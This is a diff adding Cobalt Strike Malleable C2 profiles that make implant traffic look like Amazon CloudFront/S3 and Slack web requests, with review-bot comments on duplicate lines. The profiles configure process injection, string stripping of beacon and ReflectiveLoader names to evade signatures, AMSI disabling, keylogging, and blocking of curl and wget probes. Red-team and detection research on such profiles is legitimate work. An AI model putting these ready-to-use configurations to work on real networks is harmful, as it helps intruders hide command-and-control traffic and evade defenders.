    Profiles/Amazon/amazon_events.profile
     1 +#amazon_events profile
     2 +#xx0hcd
     3 + 
     4 +###Global Options###
     5 +set sample_name "amazon_events.profile";
     6 + 
     7 +set sleeptime "38500";
     8 +set jitter "27";
     9 +set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36";
     10 +set data_jitter "50";
     11 + 
     12 +set host_stage "false";
     13 + 
     14 +###DNS options###
     15 +dns-beacon {
     16 + # Options moved into 'dns-beacon' group in 4.3:
     17 + set dns_idle "8.8.8.8";
     18 + set dns_max_txt "220";
     19 + set dns_sleep "0";
     20 + set dns_ttl "1";
     21 + set maxdns "255";
     22 + set dns_stager_prepend ".wwwds.";
     23 + set dns_stager_subhost ".e2867.dsca.";
     24 +
     25 + # DNS subhost override options added in 4.3:
     26 + set beacon "d-bx.";
     27 + set get_A "d-1ax.";
     28 + set get_AAAA "d-4ax.";
     29 + set get_TXT "d-1tx.";
     30 + set put_metadata "d-1mx";
     31 + set put_output "d-1ox.";
     32 + set ns_response "zero";
     33 +}
     34 + 
     35 +###SMB options###
     36 +set pipename "ntsvcs##";
     37 +set pipename_stager "scerpc##";
     38 +set smb_frame_header "";
     39 + 
     40 +###TCP options###
     41 +set tcp_port "8000";
     42 +set tcp_frame_header "";
     43 + 
     44 +###SSH BANNER###
     45 +set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
     46 +set ssh_pipename "SearchTextHarvester##";
     47 + 
     48 +###Steal Token
     49 +set steal_token_access_mask "11";
     50 + 
     51 +###Proxy Options
     52 +set tasks_max_size "1048576";
     53 +set tasks_proxy_max_size "921600";
     54 +set tasks_dns_proxy_max_size "71680";
     55 + 
     56 +###SSL Options###
     57 +#https-certificate {
     58 +# set keystore "domain001.store";
     59 +# set password "password123";
     60 +#}
     61 + 
     62 +#code-signer {
     63 + #set keystore "your_keystore.jks";
     64 + #set password "your_password";
     65 + #set alias "server";
     66 +#}
     67 + 
     68 +###HTTP-Config Block###
     69 +http-config {
     70 +# set headers "Server, Content-Type";
     71 +# header "Content-Type" "text/html;charset=UTF-8";
     72 +# header "Server" "nginx";
     73 +#
     74 + set trust_x_forwarded_for "false";
     75 +
     76 + set block_useragents "curl*,lynx*,wget*";
     77 +}
     78 + 
     79 +#set headers_remove "image/x-xbitmap, image/pjpeg, application/vnd";
     80 + 
     81 +###HTTP-GET Block###
     82 +http-get {
     83 + 
     84 + set uri "/broadcast";
     85 +
     86 + client {
     87 + 
     88 + #header "Host" "d23tl967axkois.cloudfront.net";
     89 + header "Accept" "application/json, text/plain, */*";
     90 + header "Accept-Language" "en-US,en;q=0.5";
     91 + header "Origin" "https://www.amazon.com";
     92 + header "Referer" "https://www.amazon.com";
     93 + header "Sec-Fetch-Dest" "empty";
     94 + header "Sec-Fetch-Mode" "cors";
     95 + header "Sec-Fetch-Site" "cross-site";
     96 + header "Te" "trailers";
     97 + 
     98 +
     99 + metadata {
     100 + base64;
     101 +
     102 + header "x-amzn-RequestId";
     103 + 
     104 + }
     105 + 
     106 + }
     107 + 
     108 + server {
     109 +
     110 + header "Content-Type" "application/json";
     111 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     112 + header "Access-Control-Allow-Methods" "GET";
     113 + header "Access-Control-Allow-Credentials" "true";
     114 + header "X-Amz-Version-Id" "null";
     115 + header "Server" "AmazonS3";
     116 + header "X-Cache" "Hit from cloudfront";
     117 +
     118 + output {
     119 + 
     120 + base64;
     121 +
     122 + prepend "
     123 +{\"broadcastEventsData\":{
     124 + \"54857e6d-c060-4b3c-914a-87adfcde093e\":{
     125 + \"lcid\":null,
     126 + \"chatStatus\":\"DISABLED\",
     127 + \"isChatEnabled\":false,
     128 + \"isCarouselEnabled\":null,
     129 + \"highlightedSegmentItemId\":\"";
     130 +
     131 + append "\"";
     132 + append "
     133 + },
     134 + \"B07YF1TNL7\":{
     135 + \"promotions\":null,
     136 + \"percentClaimed\":0,
     137 + \"primeAccessType\":null,
     138 + \"endDate\":\"1970-01-01T00:00:00Z\",
     139 + \"primeBenefitSaving\":null,
     140 + \"dealId\":\"2b2f3426\",
     141 + \"percentOff\":15,
     142 + \"state\":\"\",
     143 + \"dealPrice\":{
     144 + \"fractionalValue\":20,
     145 + \"currencySymbol\":\"$\",
     146 + \"wholeValue\":89
     147 + },
     148 + \"dealType\":\"BEST_DEAL\",
     149 + \"listPrice\":{
     150 + \"fractionalValue\":99,
     151 + \"currencySymbol\":\"$\",
     152 + \"wholeValue\":104
     153 + },
     154 + \"primeExclusive\":false
     155 + },
     156 + \"B071CQCBBN\":{
     157 + \"promotions\":null,
     158 + \"percentClaimed\":0,
     159 + \"primeAccessType\":null,
     160 + \"endDate\":\"1970-01-01T00:00:00Z\",
     161 + \"primeBenefitSaving\":null,
     162 + \"dealId\":\"09a7bbc8\",
     163 + \"percentOff\":15,
     164 + \"state\":\"\",
     165 + \"dealPrice\":{
     166 + \"fractionalValue\":99,
     167 + \"currencySymbol\":\"$\",
     168 + \"wholeValue\":84
     169 + },
     170 + \"dealType\":\"BEST_DEAL\",
     171 + \"listPrice\":{
     172 + \"fractionalValue\":99,
     173 + \"currencySymbol\":\"$\",
     174 + \"wholeValue\":99
     175 + },
     176 + \"primeExclusive\":false
     177 + }
     178 + },
     179 + \"throttled\":false
     180 + },
     181 + \"isLiveBadgeEnabled\":null,
     182 + \"liveViewers\":-1,
     183 + \"interactiveEvents\":[
     184 + ],
     185 + \"vods\":null,
     186 + \"hlsUrl\":
     187 + \"https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-87adfcde093e.m3u8\"
     188 + }
     189 + },
     190 + \"version\":\"1.0\"
     191 +}";
     192 +
     193 + 
     194 + print;
     195 + }
     196 + }
     197 +}
     198 + 
     199 + 
     200 + 
     201 +###HTTP-Post Block###
     202 +http-post {
     203 +
     204 + set uri "/1/events/com.amazon.csm.csa.prod";
     205 + #set verb "GET";
     206 + set verb "POST";
     207 + 
     208 + client {
     209 + 
     210 + #header "Host" "unagi.amazon.com";
     211 + header "Accept" "*/*";
     212 + #header "Accept-Language" "en-US,en;q=0.5";
     213 + #header "Content-Type" "text/plain;charset=UTF-8";
     214 + header "Origin" "https://www.amazon.com";
     215 +
     216 + output {
     217 + base64url;
     218 +
     219 + prepend "{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"application\":\"Retail:Prod:,\"requestId\":\"MBFV82TTQV2JNBKJJ50B\",\"title\":\"Amazon.com. Spend less. Smile more.\",\"subPageType\":\"desktop\",\"session\":{\"id\":\"133-9905055-2677266\"},\"video\":{\"id\":\"";
     220 + 
     221 + append "\"\n";
     222 + append "\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"isAudioOn\":\"false\",\"player\":\"IVS\",\"event\":\"NONE\"}}}}]}";
     223 + 
     224 +
     225 + print;
     226 +
     227 + }
     228 + 
     229 + id {
     230 + base64url;
     231 + #parameter "id";
     232 + header "x-amz-rid";
     233 + 
     234 + }
     235 + }
     236 + 
     237 + server {
     238 +
     239 + header "Server" "Server";
     240 + header "Content-Type" "application/json";
     241 + header "Connection" "close";
     242 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     243 + header "Access-Control-Expose-Headers" "x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date";
     244 + header "Access-Control-Allow-Credentials" "true";
     245 + header "Vary" "Origin,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-Agent";
     246 + header "Permissions-Policy" "interest-cohort=()";
     247 + 
     248 + output {
     249 + netbios;
     250 +
     251 + prepend "\n";
     252 + prepend "{";
     253 +
     254 + append "\n";
     255 + append "}";
     256 + 
     257 + print;
     258 + }
     259 + }
     260 +}
     261 + 
     262 + 
     263 + 
     264 +###HTTP-Stager Block###
     265 +http-stager {
     266 + set uri_x86 "/1/Events/com.amazon.csm.csa.prod";
     267 + set uri_x64 "/2/events/com.amazon.csm.csa.prod";
     268 +
     269 + client {
     270 + 
     271 + #header "Host" "unagi.amazon.com";
     272 + header "Accept" "*/*";
     273 + header "Accept-Language" "en-US,en;q=0.5";
     274 + header "Connection" "close";
     275 + }
     276 +
     277 + server {
     278 +
     279 + header "Content-Type" "application/json";
     280 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     281 + header "Access-Control-Allow-Methods" "GET";
     282 + header "Access-Control-Allow-Credentials" "true";
     283 + header "X-Amz-Version-Id" "null";
     284 + header "Server" "AmazonS3";
     285 + header "X-Cache" "Hit from cloudfront";
     286 +
     287 + output {
     288 +
     289 + print;
     290 + }
     291 + }
     292 +}
     293 + 
     294 + 
     295 +###Malleable PE/Stage Block###
     296 +stage {
     297 + set checksum "0";
     298 + set compile_time "12 Dec 2019 02:52:11";
     299 + set entry_point "170000";
     300 + #set image_size_x86 "6586368";
     301 + #set image_size_x64 "6586368";
     302 + #set name "WWanMM.dll";
     303 + set userwx "false";
     304 + set cleanup "true";
     305 + set sleep_mask "true";
     306 + set stomppe "true";
     307 + set obfuscate "true";
     308 + set rich_header "";
     309 +
     310 + set sleep_mask "true";
     311 +
     312 + set smartinject "true";
     313 +
     314 + #set allocator "HeapAlloc";
     315 + set magic_mz_x86 "MZRE";
     316 + set magic_mz_x64 "MZAR";
     317 + set magic_pe "EA";
     318 + 
     319 + set module_x86 "wwanmm.dll";
     320 + set module_x64 "wwanmm.dll";
     321 + 
     322 + transform-x86 {
     323 + prepend "\x90\x90\x90";
     324 + strrep "ReflectiveLoader" "";
     325 + strrep "beacon.dll" "";
     326 + }
     327 + 
     328 + transform-x64 {
     329 + prepend "\x90\x90\x90";
     330 + strrep "ReflectiveLoader" "";
     331 + strrep "beacon.x64.dll" "";
     332 + }
     333 + 
     334 + #string "something";
     335 + #data "something";
     336 + #stringw "something";
     337 +}
     338 + 
     339 +###Process Inject Block###
     340 +process-inject {
     341 + 
     342 + set allocator "NtMapViewOfSection";
     343 +
     344 + set bof_allocator "VirtualAlloc";
     345 + set bof_reuse_memory "true";
     346 + 
     347 + set min_alloc "16700";
     348 + 
     349 + set userwx "false";
     350 +
     351 + set startrwx "true";
     352 +
     353 + transform-x86 {
     354 + prepend "\x90\x90\x90";
     355 + }
     356 + transform-x64 {
     357 + prepend "\x90\x90\x90";
     358 + }
     359 + 
     360 + execute {
     361 + #CreateThread;
     362 + #CreateRemoteThread;
     363 + 
     364 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     365 + 
     366 + SetThreadContext;
     367 + 
     368 + NtQueueApcThread-s;
     369 + 
     370 + #NtQueueApcThread;
     371 + 
     372 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     373 + 
     374 + CreateRemoteThread;
     375 + RtlCreateUserThread;
     376 + }
     377 +}
     378 + 
     379 +###Post-Ex Block###
     380 +post-ex {
     381 + 
     382 + set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
     383 + set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
     384 + 
     385 + set obfuscate "true";
     386 + 
     387 + set smartinject "true";
     388 + 
     389 + set amsi_disable "true";
     390 +
     391 + set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
     392 + set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
     393 + set keylogger "SetWindowsHookEx";
     394 + 
     395 +}
     396 + 
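Review bot: `set sleep_mask "true";` is declared twice inside the stage block (gutter lines 305 and 310); the second occurrence is redundant and should be dropped so the block reads `set sleep_mask "true";` once. The same duplicated pair appears in Profiles/Amazon/amazon_events_modified.profile (gutter lines 311 and 316), so both files want the same cleanup. The file header carries only an author handle, while the dns-beacon comment already states that the grouped options exist from 4.3, so the minimum version the profile expects should be stated once at the top, e.g. `# Requires Cobalt Strike 4.3+ (dns-beacon option group)`.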
    Profiles/Amazon/amazon_events_modified.profile
     1 +#amazon_events profile
     2 +#Created by xx0hcd
     3 +#Modified by Kleiton Kurti (@kleiton0x7e) & John Stigerwalt (@jstigerwalt1)
     4 + 
     5 +###Global Options###
     6 +set sample_name "amazon_events_modified.profile";
     7 + 
     8 +set sleeptime "18500";
     9 +set jitter "35";
     10 +set useragent "<RAND>"; # "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"; Use random Internet Explorer UA by default
     11 +set data_jitter "50";
     12 + 
     13 +set host_stage "false";
     14 + 
     15 +set create_remote_thread "true"; # Allow beacon to create threads in other processes
     16 +set hijack_remote_thread "true"; # Allow beacon to run jobs by hijacking the primary thread of a suspeneded process
     17 + 
     18 +###DNS options###
     19 +dns-beacon {
     20 + # Options moved into 'dns-beacon' group in 4.3:
     21 + set dns_idle "8.8.8.8";
     22 + set dns_max_txt "220";
     23 + set dns_sleep "0";
     24 + set dns_ttl "1";
     25 + set maxdns "255";
     26 + set dns_stager_prepend ".wwwds.";
     27 + set dns_stager_subhost ".e2867.dsca.";
     28 +
     29 + # DNS subhost override options added in 4.3:
     30 + set beacon "d-bx.";
     31 + set get_A "d-1ax.";
     32 + set get_AAAA "d-4ax.";
     33 + set get_TXT "d-1tx.";
     34 + set put_metadata "d-1mx";
     35 + set put_output "d-1ox.";
     36 + set ns_response "zero";
     37 +}
     38 + 
     39 +###SMB options###
     40 +set pipename "ntsvcs##";
     41 +set pipename_stager "scerpc##";
     42 +set smb_frame_header "";
     43 + 
     44 +###TCP options###
     45 +set tcp_port "8000";
     46 +set tcp_frame_header "";
     47 + 
     48 +###SSH BANNER###
     49 +set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
     50 +set ssh_pipename "SearchTextHarvester##";
     51 + 
     52 +###Steal Token
     53 +set steal_token_access_mask "11";
     54 + 
     55 +###Proxy Options
     56 +set tasks_max_size "3604500";
     57 +set tasks_proxy_max_size "921600";
     58 +set tasks_dns_proxy_max_size "71680";
     59 + 
     60 +###SSL Options###
     61 +#https-certificate {
     62 +# set keystore "domain001.store";
     63 +# set password "password123";
     64 +#}
     65 + 
     66 +#code-signer {
     67 + #set keystore "your_keystore.jks";
     68 + #set password "your_password";
     69 + #set alias "server";
     70 +#}
     71 + 
     72 +###HTTP-Config Block###
     73 +http-config {
     74 +# set headers "Server, Content-Type";
     75 +# header "Content-Type" "text/html;charset=UTF-8";
     76 +# header "Server" "nginx";
     77 +#
     78 + set trust_x_forwarded_for "false";
     79 +
     80 + set block_useragents "curl*,lynx*,wget*";
     81 +}
     82 + 
     83 +#set headers_remove "image/x-xbitmap, image/pjpeg, application/vnd";
     84 + 
     85 +###HTTP-GET Block###
     86 +http-get {
     87 + 
     88 + set uri "/broadcast";
     89 +
     90 + client {
     91 + 
     92 + #header "Host" "d23tl967axkois.cloudfront.net";
     93 + header "Accept" "application/json, text/plain, */*";
     94 + header "Accept-Language" "en-US,en;q=0.5";
     95 + header "Origin" "https://www.amazon.com";
     96 + header "Referer" "https://www.amazon.com";
     97 + header "Sec-Fetch-Dest" "empty";
     98 + header "Sec-Fetch-Mode" "cors";
     99 + header "Sec-Fetch-Site" "cross-site";
     100 + header "Te" "trailers";
     101 + 
     102 +
     103 + metadata {
     104 + base64;
     105 +
     106 + header "x-amzn-RequestId";
     107 + 
     108 + }
     109 + 
     110 + }
     111 + 
     112 + server {
     113 +
     114 + header "Content-Type" "application/json";
     115 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     116 + header "Access-Control-Allow-Methods" "GET";
     117 + header "Access-Control-Allow-Credentials" "true";
     118 + header "X-Amz-Version-Id" "null";
     119 + header "Server" "AmazonS3";
     120 + header "X-Cache" "Hit from cloudfront";
     121 +
     122 + output {
     123 + 
     124 + base64;
     125 +
     126 + prepend "
     127 +{\"broadcastEventsData\":{
     128 + \"54857e6d-c060-4b3c-914a-87adfcde093e\":{
     129 + \"lcid\":null,
     130 + \"chatStatus\":\"DISABLED\",
     131 + \"isChatEnabled\":false,
     132 + \"isCarouselEnabled\":null,
     133 + \"highlightedSegmentItemId\":\"";
     134 +
     135 + append "\"";
     136 + append "
     137 + },
     138 + \"B07YF1TNL7\":{
     139 + \"promotions\":null,
     140 + \"percentClaimed\":0,
     141 + \"primeAccessType\":null,
     142 + \"endDate\":\"1970-01-01T00:00:00Z\",
     143 + \"primeBenefitSaving\":null,
     144 + \"dealId\":\"2b2f3426\",
     145 + \"percentOff\":15,
     146 + \"state\":\"\",
     147 + \"dealPrice\":{
     148 + \"fractionalValue\":20,
     149 + \"currencySymbol\":\"$\",
     150 + \"wholeValue\":89
     151 + },
     152 + \"dealType\":\"BEST_DEAL\",
     153 + \"listPrice\":{
     154 + \"fractionalValue\":99,
     155 + \"currencySymbol\":\"$\",
     156 + \"wholeValue\":104
     157 + },
     158 + \"primeExclusive\":false
     159 + },
     160 + \"B071CQCBBN\":{
     161 + \"promotions\":null,
     162 + \"percentClaimed\":0,
     163 + \"primeAccessType\":null,
     164 + \"endDate\":\"1970-01-01T00:00:00Z\",
     165 + \"primeBenefitSaving\":null,
     166 + \"dealId\":\"09a7bbc8\",
     167 + \"percentOff\":15,
     168 + \"state\":\"\",
     169 + \"dealPrice\":{
     170 + \"fractionalValue\":99,
     171 + \"currencySymbol\":\"$\",
     172 + \"wholeValue\":84
     173 + },
     174 + \"dealType\":\"BEST_DEAL\",
     175 + \"listPrice\":{
     176 + \"fractionalValue\":99,
     177 + \"currencySymbol\":\"$\",
     178 + \"wholeValue\":99
     179 + },
     180 + \"primeExclusive\":false
     181 + }
     182 + },
     183 + \"throttled\":false
     184 + },
     185 + \"isLiveBadgeEnabled\":null,
     186 + \"liveViewers\":-1,
     187 + \"interactiveEvents\":[
     188 + ],
     189 + \"vods\":null,
     190 + \"hlsUrl\":
     191 + \"https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-87adfcde093e.m3u8\"
     192 + }
     193 + },
     194 + \"version\":\"1.0\"
     195 +}";
     196 +
     197 + 
     198 + print;
     199 + }
     200 + }
     201 +}
     202 + 
     203 + 
     204 + 
     205 +###HTTP-Post Block###
     206 +http-post {
     207 +
     208 + set uri "/1/events/com.amazon.csm.csa.prod";
     209 + #set verb "GET";
     210 + set verb "POST";
     211 + 
     212 + client {
     213 + 
     214 + #header "Host" "unagi.amazon.com";
     215 + header "Accept" "*/*";
     216 + #header "Accept-Language" "en-US,en;q=0.5";
     217 + #header "Content-Type" "text/plain;charset=UTF-8";
     218 + header "Origin" "https://www.amazon.com";
     219 +
     220 + output {
     221 + base64url;
     222 +
     223 + prepend "{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"application\":\"Retail:Prod:,\"requestId\":\"MBFV82TTQV2JNBKJJ50B\",\"title\":\"Amazon.com. Spend less. Smile more.\",\"subPageType\":\"desktop\",\"session\":{\"id\":\"133-9905055-2677266\"},\"video\":{\"id\":\"";
     224 + 
     225 + append "\"\n";
     226 + append "\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"isAudioOn\":\"false\",\"player\":\"IVS\",\"event\":\"NONE\"}}}}]}";
     227 + 
     228 +
     229 + print;
     230 +
     231 + }
     232 + 
     233 + id {
     234 + base64url;
     235 + #parameter "id";
     236 + header "x-amz-rid";
     237 + 
     238 + }
     239 + }
     240 + 
     241 + server {
     242 +
     243 + header "Server" "Server";
     244 + header "Content-Type" "application/json";
     245 + header "Connection" "close";
     246 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     247 + header "Access-Control-Expose-Headers" "x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date";
     248 + header "Access-Control-Allow-Credentials" "true";
     249 + header "Vary" "Origin,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-Agent";
     250 + header "Permissions-Policy" "interest-cohort=()";
     251 + 
     252 + output {
     253 + netbios;
     254 +
     255 + prepend "\n";
     256 + prepend "{";
     257 +
     258 + append "\n";
     259 + append "}";
     260 + 
     261 + print;
     262 + }
     263 + }
     264 +}
     265 + 
     266 + 
     267 + 
     268 +###HTTP-Stager Block###
     269 +http-stager {
     270 + set uri_x86 "/1/Events/com.amazon.csm.csa.prod";
     271 + set uri_x64 "/2/events/com.amazon.csm.csa.prod";
     272 +
     273 + client {
     274 + 
     275 + #header "Host" "unagi.amazon.com";
     276 + header "Accept" "*/*";
     277 + header "Accept-Language" "en-US,en;q=0.5";
     278 + header "Connection" "close";
     279 + }
     280 +
     281 + server {
     282 +
     283 + header "Content-Type" "application/json";
     284 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     285 + header "Access-Control-Allow-Methods" "GET";
     286 + header "Access-Control-Allow-Credentials" "true";
     287 + header "X-Amz-Version-Id" "null";
     288 + header "Server" "AmazonS3";
     289 + header "X-Cache" "Hit from cloudfront";
     290 +
     291 + output {
     292 +
     293 + print;
     294 + }
     295 + }
     296 +}
     297 + 
     298 + 
     299 +###Malleable PE/Stage Block###
     300 +stage {
     301 + set checksum "0";
     302 + set compile_time "5 May 2023 10:52:15";
     303 + set entry_point "170000";
     304 + #set image_size_x86 "6586368";
     305 + #set image_size_x64 "6586368";
     306 + set name "srv.dll";
     307 + set magic_mz_x64 "OOPS";
     308 + set magic_mz_x86 "OOPS";
     309 + set userwx "false";
     310 + set cleanup "true";
     311 + set sleep_mask "true";
     312 + set stomppe "true";
     313 + set obfuscate "true";
     314 + set rich_header "\x71\xd5\xdf\x19\x38\x77\xab\x8d\x2b\x41\x5e\xcb\x98\x22\x05\x90";
     315 +
     316 + set sleep_mask "true";
     317 +
     318 + set smartinject "true";
     319 +
     320 + #set allocator "HeapAlloc";
     321 + set magic_pe "EA";
     322 + 
     323 + set module_x86 "wwanmm.dll";
     324 + set module_x64 "wwanmm.dll";
     325 + 
     326 + transform-x86 {
     327 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     328 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     329 + strrep "ReflectiveLoader" "";
     330 + strrep "beacon.dll" "";
     331 + strrep "beacon.dll" ""; # Remove this text
     332 + strrep "msvcrt.dll" "";
     333 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     334 + }
     335 + 
     336 + transform-x64 {
     337 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     338 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     339 + strrep "ReflectiveLoader" "";
     340 + strrep "beacon.x64.dll" "";
     341 + strrep "beacon.dll" ""; # Remove this text
     342 + strrep "msvcrt.dll" "";
     343 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     344 + strrep "Stack around the variable" "";
     345 + strrep "was corrupted." "";
     346 + strrep "The variable" "";
     347 + strrep "is being used without being initialized." "";
     348 + strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
     349 + strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
     350 + strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
     351 + strrep "Stack memory was corrupted" "";
     352 + strrep "A local variable was used before it was initialized" "";
     353 + strrep "Stack memory around _alloca was corrupted" "";
     354 + strrep "Unknown Runtime Check Error" "";
     355 + strrep "Unknown Filename" "";
     356 + strrep "Unknown Module Name" "";
     357 + strrep "Run-Time Check Failure" "";
     358 + strrep "Stack corrupted near unknown variable" "";
     359 + strrep "Stack pointer corruption" "";
     360 + strrep "Cast to smaller type causing loss of data" "";
     361 + strrep "Stack memory corruption" "";
     362 + strrep "Local variable used before initialization" "";
     363 + strrep "Stack around" "corrupted";
     364 + strrep "operator" "";
     365 + strrep "operator co_await" "";
     366 + strrep "operator<=>" "";
     367 + }
     368 +}
     369 + 
     370 +###Process Inject Block###
     371 +process-inject {
     372 + set allocator "NtMapViewOfSection";
     373 + set bof_allocator "VirtualAlloc";
     374 + set bof_reuse_memory "true";
     375 + set min_alloc "16700";
     376 + set userwx "false";
     377 + set startrwx "false";
     378 +
     379 + transform-x86 {
     380 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     381 + }
     382 + transform-x64 {
     383 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     384 + }
     385 + 
     386 + execute {
     387 + #CreateThread;
     388 + #CreateRemoteThread;
     389 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     390 + SetThreadContext;
     391 + NtQueueApcThread-s;
     392 + #NtQueueApcThread;
     393 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     394 + CreateRemoteThread;
     395 + RtlCreateUserThread;
     396 + }
     397 +}
     398 + 
     399 +###Post-Ex Block###
     400 +post-ex {
     401 + set spawnto_x86 "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding";
     402 + set spawnto_x64 "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding";
     403 + set obfuscate "true";
     404 + set smartinject "true";
     405 + set amsi_disable "false";
     406 + set keylogger "GetAsyncKeyState";
     407 + #set threadhint "module!function+0x##"
     408 +}
     409 + 
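Review bot: `strrep "beacon.dll" "";` appears twice in the transform-x86 block (gutter lines 330 and 331, the second with a `# Remove this text` comment); one of them should be dropped. The commented `#set threadhint "module!function+0x##"` on gutter line 407 uses an option name that differs from `set thread_hint` in Profiles/Amazon/amazon_events.profile and has no closing semicolon, so it would not act as a drop-in if uncommented; write it as `#set thread_hint "module!function+0x##";`. The comment on gutter line 16 misspells "suspended". The comment on gutter line 10 says a random Internet Explorer UA is used by default while the quoted example is a Firefox string; confirm which family `<RAND>` selects and make the comment match.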
    Profiles/Slack/slack.profile
     1 +#slack profile
     2 +#used a MS dev group from a 'top slack groups' list
     3 +#xx0hcd
     4 + 
     5 + 
     6 +set sleeptime "30000";
     7 +set jitter "20";
     8 +set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
     9 +set dns_idle "8.8.8.8";
     10 +set maxdns "235";
     11 + 
     12 +#custom cert
     13 +#https-certificate {
     14 +# set keystore "your_store_file.store";
     15 +# set password "your_store_pass";
     16 +#}
     17 + 
     18 +http-config {
     19 +# set headers "Server, Content-Type, Cache-Control, Connection";
     20 +# header "Content-Type" "text/html;charset=UTF-8";
     21 +# header "Connection" "close";
     22 +# header "Cache-Control" "max-age=2";
     23 +# header "Server" "nginx";
     24 + #set "true" if teamserver is behind redirector
     25 + set trust_x_forwarded_for "false";
     26 +}
     27 + 
     28 +http-get {
     29 + 
     30 + set uri "/messages/C0527B0NM";
     31 +
     32 + client {
     33 + 
     34 +# header "Host" "msdevchat.slack.com";
     35 + header "Accept" "*/*";
     36 + header "Accept-Language" "en-US";
     37 + header "Connection" "close";
     38 +
     39 +
     40 + metadata {
     41 + base64url;
     42 +
     43 + append ";_ga=GA1.2.875";
     44 + append ";__ar_v4=%8867UMDGS643";
     45 + prepend "d=";
     46 +# prepend "cvo_sid1=R456BNMD64;";
     47 + prepend "_ga=GA1.2.875;";
     48 + prepend "b=.12vPkW22o;";
     49 + header "Cookie";
     50 + 
     51 + }
     52 + 
     53 + }
     54 + 
     55 + server {
     56 + 
     57 + header "Content-Type" "text/html; charset=utf-8";
     58 + header "Connection" "close";
     59 + header "Server" "Apache";
     60 + header "X-XSS-Protection" "0";
     61 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     62 + header "Referrer-Policy" "no-referrer";
     63 + header "X-Slack-Backend" "h";
     64 + header "Pragma" "no-cache";
     65 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     66 + header "X-Frame-Options" "SAMEORIGIN";
     67 + header "Vary" "Accept-Encoding";
     68 + header "X-Via" "haproxy-www-w6k7";
     69 +
     70 + 
     71 + output {
     72 + 
     73 + base64url;
     74 + 
     75 + prepend "<!DOCTYPE html>
     76 +<html lang=\"en-US\" class=\"supports_custom_scrollbar\">
     77 + 
     78 + <head>
     79 + 
     80 +<meta charset=\"utf-8\">
     81 +<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">
     82 +<meta name=\"referrer\" content=\"no-referrer\">
     83 +<meta name=\"superfish\" content=\"nofish\">
     84 + <title>Microsoft Developer Chat Slack</title>
     85 + <meta name=\"author\" content=\"Slack\">
     86 +
     87 + 
     88 + <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";
     89 + 
     90 + append "\"> </script>";
     91 +
     92 + append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">
     93 + 
     94 +
     95 +<div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">
     96 + <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>
     97 + 
     98 + <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">
